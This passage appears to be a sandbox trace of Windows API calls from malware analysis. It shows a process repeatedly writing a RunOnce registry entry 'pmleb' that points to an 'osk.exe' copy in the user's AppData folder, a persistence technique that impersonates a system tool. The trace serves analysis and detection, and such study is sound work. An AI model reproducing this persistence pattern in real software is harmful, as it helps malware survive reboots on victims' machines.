hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.267] RegCloseKey (hKey=0x280) returned 0x0 [0111.267] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.267] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.267] SetTimer (hWnd=0x20280, nIDEvent=0x2493, uElapse=0xa, lpTimerFunc=0x0) returned 0x2493 [0111.268] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.280] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.280] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.281] KillTimer (hWnd=0x20280, uIDEvent=0x2493) returned 1 [0111.281] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.281] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.281] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.282] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.282] RegCloseKey (hKey=0x280) returned 0x0 [0111.282] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.282] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.282] SetTimer (hWnd=0x20280, nIDEvent=0x2494, uElapse=0xa, lpTimerFunc=0x0) returned 0x2494 [0111.282] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.296] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.296] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.296] KillTimer (hWnd=0x20280, uIDEvent=0x2494) returned 1 [0111.297] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.297] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.297] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.297] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.298] RegCloseKey (hKey=0x280) returned 0x0 [0111.298] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.298] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.298] SetTimer (hWnd=0x20280, nIDEvent=0x2495, uElapse=0xa, lpTimerFunc=0x0) returned 0x2495 [0111.298] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.338] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.338] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.338] KillTimer (hWnd=0x20280, uIDEvent=0x2495) returned 1 [0111.338] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.339] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.341] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.341] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.341] RegCloseKey (hKey=0x280) returned 0x0 [0111.342] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.342] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.342] SetTimer (hWnd=0x20280, nIDEvent=0x2496, uElapse=0xa, lpTimerFunc=0x0) returned 0x2496 [0111.348] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.348] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.348] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.349] KillTimer (hWnd=0x20280, uIDEvent=0x2496) returned 1 [0111.349] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.360] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.360] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.361] RegCloseKey (hKey=0x280) returned 0x0 [0111.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.361] SetTimer (hWnd=0x20280, nIDEvent=0x2497, uElapse=0xa, lpTimerFunc=0x0) returned 0x2497 [0111.361] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.414] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.414] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.414] KillTimer (hWnd=0x20280, 
uIDEvent=0x2497) returned 1 [0111.415] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.415] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.415] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.415] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.416] RegCloseKey (hKey=0x280) returned 0x0 [0111.416] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.416] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.416] SetTimer (hWnd=0x20280, nIDEvent=0x2498, uElapse=0xa, lpTimerFunc=0x0) returned 0x2498 [0111.416] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.421] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.421] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.421] KillTimer (hWnd=0x20280, uIDEvent=0x2498) returned 1 [0111.422] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.422] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.422] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.422] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.423] RegCloseKey (hKey=0x280) returned 0x0 [0111.423] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.423] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.423] SetTimer (hWnd=0x20280, nIDEvent=0x2499, uElapse=0xa, lpTimerFunc=0x0) returned 0x2499 [0111.423] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.441] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.441] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.441] KillTimer (hWnd=0x20280, uIDEvent=0x2499) returned 1 [0111.441] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.442] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.442] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.442] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.442] RegCloseKey (hKey=0x280) returned 0x0 [0111.442] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.442] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.442] SetTimer (hWnd=0x20280, nIDEvent=0x249a, uElapse=0xa, lpTimerFunc=0x0) returned 0x249a [0111.442] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.462] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.462] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.463] KillTimer (hWnd=0x20280, uIDEvent=0x249a) returned 1 [0111.463] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0111.463] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.464] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.464] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.464] RegCloseKey (hKey=0x280) returned 0x0 [0111.464] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.464] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.464] SetTimer (hWnd=0x20280, nIDEvent=0x249b, uElapse=0xa, lpTimerFunc=0x0) returned 0x249b [0111.464] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.485] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.485] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.485] KillTimer (hWnd=0x20280, uIDEvent=0x249b) returned 1 [0111.485] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.486] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.486] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.486] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.486] RegCloseKey (hKey=0x280) returned 0x0 
[0111.486] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.486] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.487] SetTimer (hWnd=0x20280, nIDEvent=0x249c, uElapse=0xa, lpTimerFunc=0x0) returned 0x249c [0111.487] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.506] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.506] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.506] KillTimer (hWnd=0x20280, uIDEvent=0x249c) returned 1 [0111.507] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.507] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.507] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.508] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.508] RegCloseKey (hKey=0x280) returned 0x0 [0111.508] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.508] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.508] SetTimer (hWnd=0x20280, nIDEvent=0x249d, uElapse=0xa, lpTimerFunc=0x0) returned 0x249d [0111.508] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.514] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.514] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.515] KillTimer (hWnd=0x20280, uIDEvent=0x249d) returned 1 [0111.515] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.515] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.515] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.516] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.516] RegCloseKey (hKey=0x280) returned 0x0 [0111.516] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.516] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.516] SetTimer (hWnd=0x20280, nIDEvent=0x249e, uElapse=0xa, lpTimerFunc=0x0) returned 0x249e [0111.516] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.530] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.530] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.530] KillTimer (hWnd=0x20280, uIDEvent=0x249e) returned 1 [0111.531] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.531] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0111.531] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0111.531] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0111.532] RegCloseKey (hKey=0x280) returned 0x0 [0111.532] IUnknown:Release (This=0x7a9740) returned 0x1 [0111.532] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.532] SetTimer (hWnd=0x20280, nIDEvent=0x249f, uElapse=0xa, lpTimerFunc=0x0) returned 0x249f [0111.532] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0111.998] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0111.998] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0111.999] KillTimer (hWnd=0x20280, uIDEvent=0x249f) returned 1 [0111.999] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0111.999] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.000] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.000] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.000] RegCloseKey (hKey=0x280) returned 0x0 [0112.000] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.000] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.000] SetTimer (hWnd=0x20280, nIDEvent=0x24a0, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a0 [0112.000] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.014] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.014] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.014] KillTimer (hWnd=0x20280, uIDEvent=0x24a0) returned 1 [0112.014] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.014] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.015] RegCreateKeyExA (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.015] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.015] RegCloseKey (hKey=0x280) returned 0x0 [0112.015] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.016] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.016] SetTimer (hWnd=0x20280, nIDEvent=0x24a1, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a1 [0112.016] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.029] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.029] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.029] KillTimer (hWnd=0x20280, uIDEvent=0x24a1) returned 1 [0112.030] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.030] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.030] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.030] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.031] RegCloseKey (hKey=0x280) returned 0x0 [0112.031] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.031] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0112.031] SetTimer (hWnd=0x20280, nIDEvent=0x24a2, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a2 [0112.031] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.045] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.045] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.045] KillTimer (hWnd=0x20280, uIDEvent=0x24a2) returned 1 [0112.046] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.046] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.046] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.047] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.047] RegCloseKey (hKey=0x280) returned 0x0 [0112.047] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.047] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.047] SetTimer (hWnd=0x20280, nIDEvent=0x24a3, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a3 [0112.047] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.060] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.060] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.060] KillTimer (hWnd=0x20280, uIDEvent=0x24a3) returned 1 [0112.061] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.061] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.061] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, 
dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.062] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.062] RegCloseKey (hKey=0x280) returned 0x0 [0112.062] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.062] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.062] SetTimer (hWnd=0x20280, nIDEvent=0x24a4, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a4 [0112.062] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0112.076] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0112.076] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0112.077] KillTimer (hWnd=0x20280, uIDEvent=0x24a4) returned 1 [0112.077] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.077] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0112.078] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0112.078] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0112.078] RegCloseKey (hKey=0x280) returned 0x0 [0112.078] IUnknown:Release (This=0x7a9740) returned 0x1 [0112.078] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0112.078] SetTimer (hWnd=0x20280, nIDEvent=0x24a5, uElapse=0xa, lpTimerFunc=0x0) returned 0x24a5 
